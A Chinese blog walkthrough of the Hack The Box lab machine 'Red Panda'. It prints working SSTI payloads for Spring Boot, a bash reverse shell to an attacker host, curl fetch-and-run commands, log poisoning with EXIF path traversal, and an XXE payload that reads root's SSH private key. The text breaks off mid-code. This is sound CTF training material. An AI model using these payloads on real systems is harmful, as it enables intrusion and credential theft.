<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="描述"><title>跟随作者思路，精进Walkthrough系列(一)：Red Panda | 高小调博客</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/latest/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/latest/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/latest/grids-responsive-min.min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/latest/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="//lib.baomitu.com/clipboard.js/latest/clipboard.min.js"></script><script type="text/javascript" src="//lib.baomitu.com/toastr.js/latest/toastr.min.js"></script><link rel="stylesheet" href="//lib.baomitu.com/toastr.js/latest/toastr.min.css"><meta name="generator" content="Hexo 8.1.1"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">跟随作者思路，精进Walkthrough系列(一)：Red Panda</h1><a id="logo" href="/.">高小调博客</a><p class="description">人生，不止代码</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/about-me/"><i class="fa fa-user"> 关于</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">跟随作者思路，精进Walkthrough系列(一)：Red Panda</h1><div class="post-meta">2022-12-18</div><div class="post-content"><h2 id="摘要"><a class="markdownIt-Anchor" href="#摘要"></a> 摘要</h2>
<p>Red Panda是一个简单的Linux机器，其内含一个用Java Spring Boot框架开发的搜索引擎网站。</p>
<p>该搜索引擎存在服务端模版注入（Server-Side Template Injection）漏洞，通过该漏洞可以获得woodenk用户的shell。</p>
<p>通过枚举系统进程，可以发现root用户运行了一个定时任务的Java程序。在审计该程序的代码之后，我们可以确认其存在XXE漏洞。通过利用XXE漏洞和定时任务，可以获得root用户的SSH私钥，进而达到提权的目的。</p>
<p>根据root用户的私钥，我们可以SSH以root身份登录，拿到root的flag。</p>
<h2 id="需要的技巧"><a class="markdownIt-Anchor" href="#需要的技巧"></a> 需要的技巧</h2>
<ul>
<li>Web枚举</li>
<li>Linux基础</li>
</ul>
<h2 id="学会的技巧"><a class="markdownIt-Anchor" href="#学会的技巧"></a> 学会的技巧</h2>
<ul>
<li>服务端模版注入(Server Side Template Injection)</li>
<li>XML实体注入(XML Entity Injection)</li>
<li>代码审计</li>
</ul>
<h2 id="枚举"><a class="markdownIt-Anchor" href="#枚举"></a> 枚举</h2>
<h3 id="nmap"><a class="markdownIt-Anchor" href="#nmap"></a> Nmap</h3>
<p>我们可以运行Nmap来发现远端主机开放的端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.170  grep &#x27;^[0-9]&#x27;  cut -d &#x27;/&#x27; -f 1  tr &#x27;\n&#x27; &#x27;,&#x27;  sed s/,$//)</span><br><span class="line">nmap -p$ports -sV 10.10.11.170</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1670584021842.png" alt="file" /></p>
<p>从结果中，我们可以看到，SSH服务运行在默认的22端口，HTTP服务则监听在8080端口。</p>
<h3 id="http"><a class="markdownIt-Anchor" href="#http"></a> HTTP</h3>
<p>浏览8080端口，我们可以看到一个叫做“Red Panda”搜索引擎的页面。</p>
<p><img src="/images/image-1670584093845.png" alt="file" /></p>
<p>当我们通过右键，选择查看源代码选项时，就可以看到该网页的源码，我们可以从title标签中看到“Red Panda Search Made with Spring Boot”，这将帮助我们分析出该网站所用到的技术。Spring Boot是一个基于Java开源的框架，常被用来创建微服务。</p>
<p><img src="/images/image-1670584368461.png" alt="file" /></p>
<p>接下来，让我们做一些随机的搜索，检查一下会有什么样的结果出现。在搜索了s字符之后，输出的结果展示了一些熊猫。</p>
<p>有趣的是，结果里包含了“You searched for:”文本而后面便紧跟了我们查询的内容。这可能存在一个潜在的XSS或SSTI攻击向量，我们将稍后回来。</p>
<p><img src="/images/image-1670584754259.png" alt="file" /></p>
<p>在作者的名字上存在一个超链接，它将引导我们去一个网页，该网页展示了一部分静态内容以及每个图片被观看了多少次。</p>
<p><img src="/images/image-1670584985455.png" alt="file" /></p>
<p>这里同样也有一个链接，可以将该表哥导出为一个XML文件，以下是作者为woodenk的XML文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">    &lt;credits&gt;</span><br><span class="line">        &lt;author&gt;woodenk&lt;/author&gt;</span><br><span class="line">        &lt;image&gt;</span><br><span class="line">            &lt;uri&gt;/img/greg.jpg&lt;/uri&gt;</span><br><span class="line">            &lt;views&gt;0&lt;/views&gt;</span><br><span class="line">        &lt;/image&gt;</span><br><span class="line">        &lt;image&gt;</span><br><span class="line">            &lt;uri&gt;/img/hungy.jpg&lt;/uri&gt;</span><br><span class="line">            &lt;views&gt;0&lt;/views&gt;</span><br><span class="line">        &lt;/image&gt;</span><br><span class="line">        &lt;image&gt;</span><br><span class="line">            &lt;uri&gt;/img/smooch.jpg&lt;/uri&gt;</span><br><span class="line">            &lt;views&gt;6&lt;/views&gt;</span><br><span class="line">        &lt;/image&gt;</span><br><span class="line">        &lt;image&gt;</span><br><span class="line">            &lt;uri&gt;/img/smiley.jpg&lt;/uri&gt;</span><br><span class="line">            &lt;views&gt;3&lt;/views&gt;</span><br><span class="line">        &lt;/image&gt;</span><br><span class="line">    &lt;totalviews&gt;9&lt;/totalviews&gt;</span><br><span class="line">&lt;/credits&gt;</span><br></pre></td></tr></table></figure>
<h3 id="什么是ssti"><a class="markdownIt-Anchor" href="#什么是ssti"></a> 什么是SSTI</h3>
<p>Web应用程序通常使用服务器端模板技术（Jinja2、Twig、FreeMaker等）来生成动态HTML响应。</p>
<p>正如OWASP所引用的，服务器端模板注入漏洞（SSTI）发生在用户输入以不安全的方式嵌入模板中并导致远程代码时在服务器上执行。</p>
<p>有关SSTI的更多信息，可以参考<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/server-side-template-injection">此处</a>。</p>
<p>现在，我们已经知道该页面使用的是Java Spring Boot，因此，让我们回到搜索引擎尝试对其进行一些服务器端模板注入攻击。</p>
<p>Java框架的一些潜在SSTI Payload可以在<a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#java">这里</a>找到。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$&#123;8*8&#125;</span><br><span class="line">#&#123;8*8&#125;</span><br><span class="line">*&#123;8*8&#125;</span><br></pre></td></tr></table></figure>
<p>当我们尝试前两个Pyload时会返回一个空白页面，并显示文本：<code>Error occurred: banned characters .</code>而第三个Payload<code>*{8*8}</code>则返回了64。</p>
<p><img src="/images/image-1670586005635.png" alt="file" /></p>
<p>这表明了该网站存在SSTI漏洞。</p>
<h2 id="初始自足点initial-foothold"><a class="markdownIt-Anchor" href="#初始自足点initial-foothold"></a> 初始自足点(Initial Foothold)</h2>
<p>我们已经验证了该网站存在SSTI漏洞，因此，我们可以尝试通过以下SSTI的payload来执行<code>id</code>命令，更多针对Spring Boot框架的Payload可以参考<a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#spring-framework-java">这里</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*&#123;T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(&#x27;id&#x27;).getInputStream())&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1670586583545.png" alt="file" /></p>
<p>该命令成功被执行了，这也再次确认了我们可以对其进行远程代码执行。</p>
<p>接下里，让我们继续尝试通过以下代码通过bash来获得一个反弹shell，更多内容可以参考<a target="_blank" rel="noopener" href="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">这里</a>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/&lt;YOUR_LOCAL_IP&gt;/1337 0&gt;&amp;1</span><br></pre></td></tr></table></figure>
<p>将上述基于bash的反弹shell代码保存进文件，在当前目录下执行以下命令来通过Python来提供HTTP服务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -m http.server 8000</span><br></pre></td></tr></table></figure>
<p>在下载和执行反弹shell的payload之前，让我们来运行netcat监听在1377端口，因为反弹shell会连接该端口：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nvlp 1337</span><br></pre></td></tr></table></figure>
<p>接下来，让我们通过curl命令来下载这个反弹shell的文件，并且保存在/tmp目录下，因为系统内的所有用户都可写。我们也需要更新之前的SSTL对应的payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*&#123;T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(&#x27;curl&lt;YOUR_LOCAL_IP&gt;:8000/shell.sh -o /tmp/shell.sh&#x27;).getInputStream())&#125;</span><br></pre></td></tr></table></figure>
<p>如果我们检查我们本地机器Python服务的日志时，我们可以注意到整个反弹shell的文件被远程主机拿到了，从这可以确认文件已经成功下载了。</p>
<p><img src="/images/image-1671350067867.png" alt="file" /></p>
<p>接下来，我们需要让文件具有可执行权限，可以通过以下包含了<code>chmod +x /tmp/shell.sh</code>命令的payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*&#123;T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(&#x27;chmod +x /tmp/shell.sh&#x27;).getInputStream())&#125;</span><br></pre></td></tr></table></figure>
<p>最终，我们可以执行反弹shell的文件，通过包含了<code>/bin/bash /tmp/shell.sh</code>命令的payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*&#123;T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(&#x27;/bin/bash /tmp/shell.sh&#x27;).getInputStream())&#125;</span><br></pre></td></tr></table></figure>
<p>然后，我们便可以获得<code>woodenk</code>用户在<code>1337</code>端口的反弹shell：</p>
<p><img src="/images/image-1671351090547.png" alt="file" /></p>
<p>在枚举文件系统，挖掘配置文件的过程中，我们发现<code>/opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java</code>文件里包含了woodenk用户的凭据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[ ** SNIP ** ]</span><br><span class="line"></span><br><span class="line">Class.forName(&quot;com.mysql.cj.jdbc.Driver&quot;);</span><br><span class="line">conn = DriverManager.getConnection(&quot;jdbc:mysql://localhost:3306/red_panda&quot;,</span><br><span class="line">&quot;woodenk&quot;, &quot;RedPandazRule&quot;);</span><br><span class="line"></span><br><span class="line">[ ** SNIP ** ]</span><br></pre></td></tr></table></figure>
<p>让我们以用户<code>woodenk</code>的身份和获得的凭据来登录SSH服务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh woodenk@10.10.11.170</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1671351440111.png" alt="file" /></p>
<p>用户的flag可以在/home/woodenk/user.txt文件里找到。</p>
<h2 id="提权"><a class="markdownIt-Anchor" href="#提权"></a> 提权</h2>
<p>我们可以使用<a target="_blank" rel="noopener" href="https://github.com/DominicBreuker/pspy">pspy</a>工具来检查所有的定时任务，我们可以在本地使用Python的HTTP服务来传输pspy可执行文件，在远程主机用wget来获取该文件：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget &lt;YOUR_LOCAL_IP&gt;:8000/pspy64</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1671351704717.png" alt="file" /></p>
<p>我们也需要使这个文件在远程主机上可执行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod +x pspy64</span><br></pre></td></tr></table></figure>
<p>通过以下命令来运行pspy工具：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./pspy</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1671352054040.png" alt="file" /></p>
<p>在pspy的输出里，我们可以看到一个jar程序以root用户身份每两分钟执行一次.</p>
<p>让我们再来检查及分析一下源码<code>/opt/creditscore/LogParser/final/src/main/java/com/logparser/App.java</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">public static void main(String[] args) throws JDOMException, IOException,JpegProcessingException &#123;</span><br><span class="line">    File log_fd = new File(&quot;/opt/panda_search/redpanda.log&quot;);</span><br><span class="line">    Scanner log_reader = new Scanner(log_fd);</span><br><span class="line">    while(log_reader.hasNextLine())</span><br><span class="line">    &#123;</span><br><span class="line">        String line = log_reader.nextLine();</span><br><span class="line">        if(!isImage(line))</span><br><span class="line">        &#123;</span><br><span class="line">            continue;</span><br><span class="line">        &#125;</span><br><span class="line">        Map parsed_data = parseLog(line);</span><br><span class="line">        System.out.println(parsed_data.get(&quot;uri&quot;));</span><br><span class="line">        String artist = getArtist(parsed_data.get(&quot;uri&quot;).toString());</span><br><span class="line">        System.out.println(&quot;Artist: &quot; + artist);</span><br><span class="line">        String xmlPath = &quot;/credits/&quot; + artist + &quot;_creds.xml&quot;;</span><br><span class="line">        addViewTo(xmlPath, parsed_data.get(&quot;uri&quot;).toString());</span><br><span class="line">     &#125;</span><br><span class="line">    //Document doc = saxBuilder.build(fd);</span><br><span class="line">     &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在上述的代码中，我们可以看到日志文件<code>/opt/panda_search/redpanda.log</code>被按行读取，其内容如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /opt/panda_search/redpanda.log</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1671352985233.png" alt="file" /></p>
<p>在循环里，日志文件的每一行都被存储在字符串变量<code>line</code>里，接下来会检查是否存在<code>.jpg</code>子串，在if语句中的<code>isImage()</code>方法里：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if(!isImage(line)) &#123;</span><br><span class="line">    continue;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在<code>isImage()</code>方法携带了一个string类型的参数，当它包含&quot;.jpg&quot;子串时返回true：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public static boolean isImage(String filename) &#123;</span><br><span class="line">    if (filename.contains(&quot;.jpg&quot;))</span><br><span class="line">        return true;</span><br><span class="line">    return false;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>如果条件满足，比如字符串中包含了&quot;.jpg&quot;子串时，<code>line</code>变量会被传进<code>parseLog()</code>方法。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">public static Map parseLog(String line) &#123;</span><br><span class="line">    String[] strings = line.split(&quot;\\\\&quot;, 4);</span><br><span class="line">    Map map = new HashMap&lt;&gt;();</span><br><span class="line">    map.put(&quot;status_code&quot;, strings[0]);</span><br><span class="line">    map.put(&quot;ip&quot;, strings[1]);</span><br><span class="line">    map.put(&quot;user_agent&quot;, strings[2]);</span><br><span class="line">    map.put(&quot;uri&quot;, strings[3]);</span><br><span class="line">    return map;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>parseLog()</code>方法会以作为分隔符，将字符串参数分割为4个不同的部分。</p>
<p>这些被分割为4块的值会根据以下key值<code>[status_code, ip, user_agent, uri]</code>被赋值给map类型的变量。</p>
<p>该方法返回的map会被存储在main函数的parsed_data变量中。</p>
<p>接下来，在map类型变量parsed_data中key为uri的值会被传递进<code>getArtist()</code>函数中：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">public static String getArtist(String uri) throws IOException, JpegProcessingException</span><br><span class="line"> &#123;</span><br><span class="line">    String fullpath = &quot;/opt/panda_search/src/main/resources/static&quot; + uri;</span><br><span class="line">    File jpgFile = new File(fullpath);</span><br><span class="line">    Metadata metadata = JpegMetadataReader.readMetadata(jpgFile);</span><br><span class="line">    for(Directory dir : metadata.getDirectories())</span><br><span class="line">     &#123;</span><br><span class="line">        for(Tag tag : dir.getTags())</span><br><span class="line">         &#123;</span><br><span class="line">            if(tag.getTagName() == &quot;Artist&quot;)</span><br><span class="line">             &#123;</span><br><span class="line">                return tag.getDescription();</span><br><span class="line">             &#125;</span><br><span class="line">         &#125;</span><br><span class="line">     &#125;</span><br><span class="line">    return &quot;N/A&quot;;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<p>被传入<code>getArtist()</code>函数的string类型的变量<code>uri</code>决定了图片文件在文件系统里的全路径，该函数会读取图片的元数据(metadata)，返回&quot;Artist&quot;的值，其返回值会被存储在main函数的artist变量里。</p>
<p>让我们回到以下代码中：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String xmlPath = &quot;/credits/&quot; + artist + &quot;_creds.xml&quot;;</span><br></pre></td></tr></table></figure>
<p>我们可以看到，artist变量的值被连接生成绝对路径，然后赋值给接下里会传递给<code>addViewTo()</code>函数。</p>
<p>我们必须注意到xmlPath变量里的路径最终会以&quot;_creds.xml&quot;结尾。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">addViewTo(xmlPath, parsed_data.get(&quot;uri&quot;).toString());</span><br></pre></td></tr></table></figure>
<p>一旦程序中包含了解析XML文件，我们便需要检查其是否存在XXE(XML External Entity)。</p>
<p>此外，xmlPath变量被确定的方式使其面对代码注入是脆弱的，因为artist变量在没有做任何预防的情况下直接被使用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String xmlPath = &quot;/credits/&quot; + artist + &quot;_creds.xml&quot;;</span><br></pre></td></tr></table></figure>
<p>我们知道，artist变量是从图片文件的元数据的Artist字段中获得的，如果我们修改了图片的元数据并且添加一个恶意的值给Artist字段，我们也许可以修改xmlPath变量中路径的值，使其指向一个我们构造的恶意XML文件。</p>
<p>图片文件的路径是由日志文件决定的，日志文件的内容是根据客户端的请求生成的，所以我们可以尝试构造一个恶意的请求，使得<code>parseLog()</code>函数解析图片文件的路径，该图片文件中的Artist元数据中被修改为恶意的路径。</p>
<p>让我们重现一下<code>parseLog()</code>函数在Python中的结果，以便于验证日志投毒。</p>
<p>我们创建一个以只读方式打开<code>/opt/panda_search/redpanda.log</code> 文件的文件描述符<code>fd</code>，其第一行被存入<code>data</code>变量里。</p>
<p>接下来，我们获得一个list，其值以作为分隔符来分割<code>data</code>字符串：</p>
<p><img src="/images/image-1671356534587.png" alt="file" /></p>
<p>我们回到<code>parseLog()</code>函数里，我们知道在分割了<code>/opt/panda_search/redpanda.log</code>文件之后，其返回的map变量里，key为uri的索引为3。</p>
<p>接下来，我们尝试注入在HTTP头<code>User-Agent</code>中，这会导致注入的值其索引为3，并且会被赋值给map中key为uri的值。</p>
<p><img src="/images/image-1671356947922.png" alt="file" /></p>
<p>躲中了！上述的结果验证了日志文件注入的可能性。</p>
<p>接下来，让我们按照上述的蓝图来验证Java程序对XXE是否脆弱。</p>
<p>首先，我们来用之前从网站上下载的xml文件来构造一个恶意的xml文件，我们将尝试通过XXE的payload来读取root用户的私钥，例如/root/.ssh/id_rsa，其内容如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;&gt;</span><br><span class="line">&lt;!DOCTYPE author [&lt;!ENTITY xxe SYSTEM &#x27;file:///root/.ssh/id_rsa&#x27;&gt;]&gt;</span><br><span class="line">&lt;credits&gt;</span><br><span class="line">    &lt;author&gt;&amp;xxe;&lt;/author&gt;</span><br><span class="line">        &lt;image&gt;</span><br><span class="line">            &lt;uri&gt;/img/greg.jpg&lt;/uri&gt;</span><br><span class="line">            &lt;views&gt;0&lt;/views&gt;</span><br><span class="line">        &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">        &lt;uri&gt;/img/hungy.jpg&lt;/uri&gt;</span><br><span class="line">        &lt;views&gt;0&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">        &lt;uri&gt;/img/smooch.jpg&lt;/uri&gt;</span><br><span class="line">        &lt;views&gt;1&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;image&gt;</span><br><span class="line">        &lt;uri&gt;/img/smiley.jpg&lt;/uri&gt;</span><br><span class="line">        &lt;views&gt;1&lt;/views&gt;</span><br><span class="line">    &lt;/image&gt;</span><br><span class="line">    &lt;totalviews&gt;2&lt;/totalviews&gt;</span><br><span class="line">&lt;/credits&gt;</span><br></pre></td></tr></table></figure>
<p>接下来，我们通过python http服务上传这个恶意的xml文件到/tmp目录下，将其重命名为<code>hax_creds.xml</code>，我们可以用任意的文件名但必须得以<code>_creds.xml</code>字串结尾正如之前我们分析的xmlPath变量的值。</p>
<p>我们可以通过Python HTTP服务在本机提供这个xml文件，在远程主机通过wget工具来进行下载：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget &lt;YOUR_LOCAL_IP&gt;:8000/export.xml</span><br></pre></td></tr></table></figure>
<p>然后修改其权限：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 777 export.xml</span><br></pre></td></tr></table></figure>
<p>最后，重命名。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mv export.xml hax_creds.xml</span><br></pre></td></tr></table></figure>
<p>为了让<code>addToView()</code>函数指向这个xml文件，我们还需要修改xmlPath变量，因为它指向了解析后的xml文件的地方。</p>
<p>我们可以使用exiftool工具修改图片中元数据的Artist字段，使得<code>getArtist()</code>函数用我们修改的图片。</p>
<p>exiftool工具，可以被用于查看和修改图片文件的元数据，可以通过以下命令来安装：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/exiftool/exiftool.git</span><br></pre></td></tr></table></figure>
<p>让我们下载来自于网站的任意一个图片，看看它的元数据。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget 10.10.11.170:8080/img/smooch.jpg</span><br></pre></td></tr></table></figure>
<p>我们可以通过<code>-Artist</code>标志来查看Artist字段：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./exiftool -Artist smooch.jpg</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1671358131818.png" alt="file" /></p>
<p>接下里，我们来修改元数据的Artist字段为<code>../tmp/hax</code>，因为我们需要<code>addViewTo()</code>函数解析到<code>/tmp/hax_creds.xml</code>文件。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./exiftool -Artist=&#x27;../tmp/hax&#x27; smooch.jpg</span><br></pre></td></tr></table></figure>
<p><img src="/images/image-1671358290839.png" alt="file" /></p>
<p>我们也需要将修改了元数据后的图片传输回远程主机，在远程主机上，我们下载该图片到<code>/tmp</code>目录。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd /tmp</span><br><span class="line">wget &lt;YOUR_LOCAL_IP&gt;:8000/smooch.jpg</span><br></pre></td></tr></table></figure>
<p>现在，如果我们想要使程序解析我们修改后的图片，我们需要在<code>/opt/panda_search/redpanda.log</code>文件中有一条日志。</p>
<p>让我们现在构造一个恶意的请求到远程主机为了使<code>/opt/panda_search/redpanda.log</code>文件创建一个实体，这样它会重定向到<code>getArtist()</code>函数到我们恶意的图片文件，我们可以使用curl加上-A标志来发送一个自定义的<code>User-Agent</code>HTTP头：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -A &quot;evil/../../../../../../tmp/smooch.jpg&quot; http://10.10.11.170:8080/</span><br></pre></td></tr></table></figure>
<p>在等待几分钟后，我们可以读取<code>/tmp/hax_creds.xml</code>文件来获得root用户的SSH私钥。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span 